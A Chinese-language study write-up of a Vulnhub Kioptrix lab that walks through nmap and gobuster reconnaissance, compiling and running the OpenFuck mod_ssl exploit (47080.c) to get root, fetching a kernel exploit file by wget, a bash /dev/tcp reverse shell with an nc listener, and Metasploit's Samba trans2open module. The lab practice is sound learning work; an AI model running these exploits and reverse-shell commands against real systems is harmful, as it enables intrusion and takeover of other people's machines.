# 前期准备
下载,解压,nat模式,先kali扫一遍内网,再开机扫一遍,确定靶机ip
![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230822222618.png)
靶机ip 192.168.49.129
-sn是ping测试,不会探查端口,更快更隐蔽一些,-sP即有ping测试又探查端口,噪音比较大,正常来说还是-sn比较好
# 信息收集
## 端口
nmap -p- 192.168.49.129
全端口扫描
![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230822223921.png)
这里发现了139端口,没见过,但是博主说这是个常见端口,就查了一下信息
端口139通常用于 Windows 系统上的 NetBIOS 服务。NetBIOS(Network Basic Input/Output System)是一种早期的网络通信协议,用于在局域网中进行网络通信、文件和打印机共享等。它提供了一种在局域网内发现其他计算机、共享资源和进行通信的机制。 具体来说,端口139用于 NetBIOS 会话服务。通过该端口,计算机可以进行以下操作: 1. 文件和打印机共享: 端口139允许计算机共享文件夹和打印机,使其他计算机可以访问这些共享资源。 2. 通信和消息传递: NetBIOS 还可以用于计算机之间的通信和消息传递。它可以在局域网内广播消息,以便进行发现和通信。
干的事类似白天做的那个```python -m http.server```,就是传文件,发信息,网络通信共享资源的
其实这一步不做也可以,但是先扫出来端口更有条理一些
### 此时获得的信息
```bash
ip
192.168.49.129
端口开放
22 ssh
80
111 rpcbind
139 文件传输资源共享
443
1024 kdm
-sV 版本信息
-A 版本,操作系统
```bash
┌──(root㉿kali)-[~]
└─# nmap -sV -A 192.168.49.129
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-22 10:49 EDT
Nmap scan report for 192.168.49.129
Host is up (0.0022s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| http-methods:
|_ Potentially risky methods: TRACE
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_http-title: 400 Bad Request
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
|_ssl-date: 2023-08-22T14:51:55+00:00; +1m52s from scanner time.
1024/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: 1m51s
TRACEROUTE
HOP RTT ADDRESS
1 2.23 ms 192.168.49.129
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.26 seconds
这里一张图截屏截不下,干脆直接复制过来吧
简单分析一下,red hat系统,使用apache服务
看了一圈没发现什么有用信息,几个路径也访问不了 扫一下目录
gobuster dir --url http://192.168.49.129 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
(这里很奇怪,系统没下gobuster,也没有SecLists的字典只能先都下下来)
apt install gobuster
git clone https://github.com/danielmiessler/SecLists.git
试了下都没什么发现,要么权限不够进不去,要么就是跳转到红帽官网的页面了
apache版本是1.3.20
这里的1.3.20是对应着servelt的版本号,可以看出版本非常老旧了,那么就有目标了,搜索apache低版本相关的漏洞
mod_ssl是apache HTTP 服务器的一个模块searchsploit是在exploit database(漏洞库)中搜索,这里也可以直接在https://www.rapid7.com/db/ 在线搜索,不过在kali里搜会出现相关漏洞路径,更方便一些(/usr/share/exploitdb/exploits)
![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230823003027.png)
在官网查到最新版本是这一条
```bash
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)|unix/remote/47080.c
给他copy到桌面方便操作
┌──(root㉿kali)-[/usr/share/exploitdb/exploits]
└─# cp unix/remote/47080.c /root/Desktop
这里打开脚本,注释里显示需要安装依赖,那么就开个虚拟环境安装依赖
python -m venv venv //我kali的python是python2
source venv/bin/activate
apt-get install libssl-dev
gcc -o 47080 47080.c -lcrypto
//gcc是编译器,-o 47080是生成名为47080的可执行文件,47080.c是需要编译的文件名字,-lcrypto是要引用的库,这个来自依赖的下一行
//内容
//博主说这是编译成功了,但乍一看就像失败了一样
┌──(venv)─(root㉿kali)-[~/Desktop/vulnhub]
└─# gcc -o 47080 47080.c -lcrypto
47080.c: In function ‘read_ssl_packet’:
47080.c:534:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
534 | RC4(ssl->rc4_read_key, rec_len, buf, buf);
| ^~~
In file included from 47080.c:26:
/usr/include/openssl/rc4.h:37:28: note: declared here
37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
| ^~~
47080.c: In function ‘send_ssl_packet’:
47080.c:583:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
583 | MD5_Init(&ctx);
| ^~~~~~~~
In file included from 47080.c:27:
/usr/include/openssl/md5.h:49:27: note: declared here
49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
| ^~~~~~~~
47080.c:584:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
584 | MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:585:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
585 | MD5_Update(&ctx, rec, rec_len);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:586:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
586 | MD5_Update(&ctx, &seq, 4);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:587:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
587 | MD5_Final(p, &ctx);
| ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
| ^~~~~~~~~
47080.c:594:17: warning: ‘RC4’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
594 | RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
| ^~~
/usr/include/openssl/rc4.h:37:28: note: declared here
37 | OSSL_DEPRECATEDIN_3_0 void RC4(RC4_KEY *key, size_t len,
| ^~~
47080.c: In function ‘send_client_master_key’:
47080.c:748:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
748 | if (EVP_PKEY_get1_RSA(pkey) == NULL) {
| ^~
In file included from /usr/include/openssl/x509.h:29,
from /usr/include/openssl/ssl.h:31,
from 47080.c:21:
/usr/include/openssl/evp.h:1348:16: note: declared here
1348 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
| ^~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘RSA_public_encrypt’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
754 | encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
| ^~~~~~~~~~~~~~~~~~~~
In file included from /usr/include/openssl/x509.h:36:
/usr/include/openssl/rsa.h:282:5: note: declared here
282 | int RSA_public_encrypt(int flen, const unsigned char *from, unsigned char *to,
| ^~~~~~~~~~~~~~~~~~
47080.c:754:9: warning: ‘EVP_PKEY_get1_RSA’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
754 | encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
| ^~~~~~~~~~~~~~~~~~~~
/usr/include/openssl/evp.h:1348:16: note: declared here
1348 | struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
| ^~~~~~~~~~~~~~~~~
47080.c: In function ‘generate_key_material’:
47080.c:791:17: warning: ‘MD5_Init’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
791 | MD5_Init(&ctx);
| ^~~~~~~~
/usr/include/openssl/md5.h:49:27: note: declared here
49 | OSSL_DEPRECATEDIN_3_0 int MD5_Init(MD5_CTX *c);
| ^~~~~~~~
47080.c:793:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
793 | MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:794:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
794 | MD5_Update(&ctx,&c,1);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:796:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
796 | MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:797:17: warning: ‘MD5_Update’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
797 | MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
| ^~~~~~~~~~
/usr/include/openssl/md5.h:50:27: note: declared here
50 | OSSL_DEPRECATEDIN_3_0 int MD5_Update(MD5_CTX *c, const void *data, size_t len);
| ^~~~~~~~~~
47080.c:798:17: warning: ‘MD5_Final’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
798 | MD5_Final(km,&ctx);
| ^~~~~~~~~
/usr/include/openssl/md5.h:51:27: note: declared here
51 | OSSL_DEPRECATEDIN_3_0 int MD5_Final(unsigned char *md, MD5_CTX *c);
| ^~~~~~~~~
47080.c: In function ‘generate_session_keys’:
47080.c:807:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
807 | RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
| ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
| ^~~~~~~~~~~
47080.c:811:9: warning: ‘RC4_set_key’ is deprecated: Since OpenSSL 3.0 [-Wdeprecated-declarations]
811 | RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
| ^~~~~~~~~~~
/usr/include/openssl/rc4.h:35:28: note: declared here
35 | OSSL_DEPRECATEDIN_3_0 void RC4_set_key(RC4_KEY *key, int len,
| ^~~~~~~~~~~
脚本已经生成,运行./47080
执行脚本,这里不能直接47080
┌──(venv)─(root㉿kali)-[~/Desktop/vulnhub]
└─# ./47080
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
: Usage: ./47080 target box [port] [-c N]
target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)
Supported OffSet:
0x00 - Caldera OpenLinux (apache-1.3.26)
0x01 - Cobalt Sun 6.0 (apache-1.3.12)
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x03 - Cobalt Sun x (apache-1.3.26)
0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)
0x05 - Conectiva 4 (apache-1.3.6)
0x06 - Conectiva 4.1 (apache-1.3.9)
0x07 - Conectiva 6 (apache-1.3.14)
0x08 - Conectiva 7 (apache-1.3.12)
0x09 - Conectiva 7 (apache-1.3.19)
0x0a - Conectiva 7/8 (apache-1.3.26)
0x0b - Conectiva 8 (apache-1.3.22)
0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
0x0d - Debian GNU Linux (apache_1.3.19-1)
0x0e - Debian GNU Linux (apache_1.3.22-2)
0x0f - Debian GNU Linux (apache-1.3.22-2.1)
0x10 - Debian GNU Linux (apache-1.3.22-5)
0x11 - Debian GNU Linux (apache_1.3.23-1)
0x12 - Debian GNU Linux (apache_1.3.24-2.1)
0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)
0x14 - Debian GNU Linux (apache_1.3.24-3)
0x15 - Debian GNU Linux (apache-1.3.26-1)
0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)
0x17 - Debian GNU Linux (apache-1.3.27)
0x18 - FreeBSD (apache-1.3.9)
0x19 - FreeBSD (apache-1.3.11)
0x1a - FreeBSD (apache-1.3.12.1.40)
0x1b - FreeBSD (apache-1.3.12.1.40)
0x1c - FreeBSD (apache-1.3.12.1.40)
0x1d - FreeBSD (apache-1.3.12.1.40_1)
0x1e - FreeBSD (apache-1.3.12)
0x1f - FreeBSD (apache-1.3.14)
0x20 - FreeBSD (apache-1.3.14)
0x21 - FreeBSD (apache-1.3.14)
0x22 - FreeBSD (apache-1.3.14)
0x23 - FreeBSD (apache-1.3.14)
0x24 - FreeBSD (apache-1.3.17_1)
0x25 - FreeBSD (apache-1.3.19)
0x26 - FreeBSD (apache-1.3.19_1)
0x27 - FreeBSD (apache-1.3.20)
0x28 - FreeBSD (apache-1.3.20)
0x29 - FreeBSD (apache-1.3.20+2.8.4)
0x2a - FreeBSD (apache-1.3.20_1)
0x2b - FreeBSD (apache-1.3.22)
0x2c - FreeBSD (apache-1.3.22_7)
0x2d - FreeBSD (apache_fp-1.3.23)
0x2e - FreeBSD (apache-1.3.24_7)
0x2f - FreeBSD (apache-1.3.24+2.8.8)
0x30 - FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
0x31 - FreeBSD 4.6-Realease (apache-1.3.26)
0x32 - FreeBSD (apache-1.3.27)
0x33 - Gentoo Linux (apache-1.3.24-r2)
0x34 - Linux Generic (apache-1.3.14)
0x35 - Mandrake Linux X.x (apache-1.3.22-10.1mdk)
0x36 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x37 - Mandrake Linux 7.1 (apache-1.3.22-1.4mdk)
0x38 - Mandrake Linux 7.2 (apache-1.3.14-2mdk)
0x39 - Mandrake Linux 7.2 (apache-1.3.14) 2
0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)
0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)
0x3c - Mandrake Linux 7.2 (apache-1.3.22-1.3mdk)
0x3d - Mandrake Linux 7.2 (apache-1.3.22-10.2mdk)
0x3e - Mandrake Linux 8.0 (apache-1.3.19-3)
0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)
0x40 - Mandrake Linux 8.2 (apache-1.3.23-4)
0x41 - Mandrake Linux 8.2 #2 (apache-1.3.23-4)
0x42 - Mandrake Linux 8.2 (apache-1.3.24)
0x43 - Mandrake Linux 9 (apache-1.3.26)
0x44 - RedHat Linux ?.? GENERIC (apache-1.3.12-1)
0x45 - RedHat Linux TEST1 (apache-1.3.12-1)
0x46 - RedHat Linux TEST2 (apache-1.3.12-1)
0x47 - RedHat Linux GENERIC (marumbi) (apache-1.2.6-5)
0x48 - RedHat Linux 4.2 (apache-1.1.3-3)
0x49 - RedHat Linux 5.0 (apache-1.2.4-4)
0x4a - RedHat Linux 5.1-Update (apache-1.2.6)
0x4b - RedHat Linux 5.1 (apache-1.2.6-4)
0x4c - RedHat Linux 5.2 (apache-1.3.3-1)
0x4d - RedHat Linux 5.2-Update (apache-1.3.14-2.5.x)
0x4e - RedHat Linux 6.0 (apache-1.3.6-7)
0x4f - RedHat Linux 6.0 (apache-1.3.6-7)
0x50 - RedHat Linux 6.0-Update (apache-1.3.14-2.6.2)
0x51 - RedHat Linux 6.0 Update (apache-1.3.24)
0x52 - RedHat Linux 6.1 (apache-1.3.9-4)1
0x53 - RedHat Linux 6.1 (apache-1.3.9-4)2
0x54 - RedHat Linux 6.1-Update (apache-1.3.14-2.6.2)
0x55 - RedHat Linux 6.1-fp2000 (apache-1.3.26)
0x56 - RedHat Linux 6.2 (apache-1.3.12-2)1
0x57 - RedHat Linux 6.2 (apache-1.3.12-2)2
0x58 - RedHat Linux 6.2 mod(apache-1.3.12-2)3
0x59 - RedHat Linux 6.2 update (apache-1.3.22-5.6)1
0x5a - RedHat Linux 6.2-Update (apache-1.3.22-5.6)2
0x5b - Redhat Linux 7.x (apache-1.3.22)
0x5c - RedHat Linux 7.x (apache-1.3.26-1)
0x5d - RedHat Linux 7.x (apache-1.3.27)
0x5e - RedHat Linux 7.0 (apache-1.3.12-25)1
0x5f - RedHat Linux 7.0 (apache-1.3.12-25)2
0x60 - RedHat Linux 7.0 (apache-1.3.14-2)
0x61 - RedHat Linux 7.0-Update (apache-1.3.22-5.7.1)
0x62 - RedHat Linux 7.0-7.1 update (apache-1.3.22-5.7.1)
0x63 - RedHat Linux 7.0-Update (apache-1.3.27-1.7.1)
0x64 - RedHat Linux 7.1 (apache-1.3.19-5)1
0x65 - RedHat Linux 7.1 (apache-1.3.19-5)2
0x66 - RedHat Linux 7.1-7.0 update (apache-1.3.22-5.7.1)
0x67 - RedHat Linux 7.1-Update (1.3.22-5.7.1)
0x68 - RedHat Linux 7.1 (apache-1.3.22-src)
0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
0x6d - RedHat Linux 7.2 (apache-1.3.24)
0x6e - RedHat Linux 7.2 (apache-1.3.26)
0x6f - RedHat Linux 7.2 (apache-1.3.26-snc)
0x70 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
0x71 - Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
0x72 - RedHat Linux 7.2-Update (apache-1.3.27-1.7.2)
0x73 - RedHat Linux 7.3 (apache-1.3.23-11)1
0x74 - RedHat Linux 7.3 (apache-1.3.23-11)2
0x75 - RedHat Linux 7.3 (apache-1.3.27)
0x76 - RedHat Linux 8.0 (apache-1.3.27)
0x77 - RedHat Linux 8.0-second (apache-1.3.27)
0x78 - RedHat Linux 8.0 (apache-2.0.40)
0x79 - Slackware Linux 4.0 (apache-1.3.6)
0x7a - Slackware Linux 7.0 (apache-1.3.9)
0x7b - Slackware Linux 7.0 (apache-1.3.26)
0x7c - Slackware 7.0 (apache-1.3.26)2
0x7d - Slackware Linux 7.1 (apache-1.3.12)
0x7e - Slackware Linux 8.0 (apache-1.3.20)
0x7f - Slackware Linux 8.1 (apache-1.3.24)
0x80 - Slackware Linux 8.1 (apache-1.3.26)
0x81 - Slackware Linux 8.1-stable (apache-1.3.26)
0x82 - Slackware Linux (apache-1.3.27)
0x83 - SuSE Linux 7.0 (apache-1.3.12)
0x84 - SuSE Linux 7.1 (apache-1.3.17)
0x85 - SuSE Linux 7.2 (apache-1.3.19)
0x86 - SuSE Linux 7.3 (apache-1.3.20)
0x87 - SuSE Linux 8.0 (apache-1.3.23)
0x88 - SUSE Linux 8.0 (apache-1.3.23-120)
0x89 - SuSE Linux 8.0 (apache-1.3.23-137)
0x8a - Yellow Dog Linux/PPC 2.3 (apache-1.3.22-6.2.3a)
Fuck to all guys who like use lamah ddos. Read SRC to have no surprise
这里给了使用说明,
![](https://cdn.jsdelivr.net/gh/taosu0216/picgo/20230823114242.png)这里先找到对应版本号,分别是0×6a和0×6b可用
```bash
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
所以脚本执行就是./47080 0×6a 192.168.49.129 -c 40
a失败,b成功,但是是apache而不是root,还得提权
这里不是root用户,提示是缺少文件了
Unable to establish SSL connection.
Unable to establish SSL connection.
gcc: ptrace-kmod.c: No such file or directory
//ptrace-kmod就是要用的但缺少的脚本
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./exploit: No such file or directory
所以就要下载对应的文件,这里先把47080.c给拿到本机来检查一下(刚好可以用昨天学的python http传文件 8000端口)
ctrl F查找
kali能下,但是靶机下不下来,那就传过去,
wget 192.168.49.130:8000/ptrace-kmod.c
成功下下来了 ok,root权限到手,之前的原因是,那个cpp脚本会自动下载对应的库(应该是,或者说别的依赖)并进行编译,但是那边网络连接不了,下不下来那个文件,那我们就自己下下来并传上去,然后就ok了
passwd,改一下密码 可以进入了,这里感觉其实已经结束了,但是接着跟着教程走学思路,接下来来个反弹shell
//kali
nc -lvvp 1234
//netcat l 监听端口 vv(v也可以)详细信息 p 1234 kali开放的端口号
//靶机,这里的130是kali的ip
bash -i >& /dev/tcp/192.168.49.130/1234 0>&1
//bash -i是可交互式命令
// >& /dev/tcp/192.168.49.130/1234 前面的>是把bash的交互的流传到后面的文件保存,&是类似指定文件的符号? dev/tcp/ip/port是固定模式,就是以tcp的方式进行连接
// 0>&1 0是标准输入(键盘敲的内容),传到1,1是标准输出,即屏幕能看到的内容就是1
连接成功
139端口
没思路,视频说开msf能查,那就开吧,msfconsole启动 SMB(Server Message Block)是一种网络协议,用于在计算机之间共享文件、打印机和其他资源。它最初由微软开发,后来成为了一种广泛使用的网络协议,用于在本地网络中实现文件和资源共享。
search smb
//smb最常用的是139和445端口
//msf的终端搜索有点像普通搜索引擎,可以关键字空格关键字这样来实现联合搜搜,这里要查版本,所以搜索
search smb version
//漏洞使用方式就是 use 名字
use auxiliary/scanner/smb/smb_version
show options //显示各种选项,这个指令应该是通用的
set rhost 192.168.49.129 //设置目标
run //执行
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.49.129:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 192.168.49.129:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 192.168.49.129: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
//拿到版本号2.2.1a
msf6 > search smb 2.2.x
[-] No results from search
msf6 > search samba 2.2.x
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/samba/nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
1 exploit/freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86)
2 exploit/linux/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Linux x86)
3 exploit/osx/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Mac OS X PPC)
4 exploit/solaris/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (Solaris SPARC)
Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/trans2open
//这一步并没有很能看懂,知道139端口,是怎么继续知道smb和samaba这两个名字来继续搜索漏洞的
//根据操作系统,选择exploit/linux/samba/trans2open
//这里还要设一个payload,这个知识盲区了
set payload linux/x86/shell_bind_tcp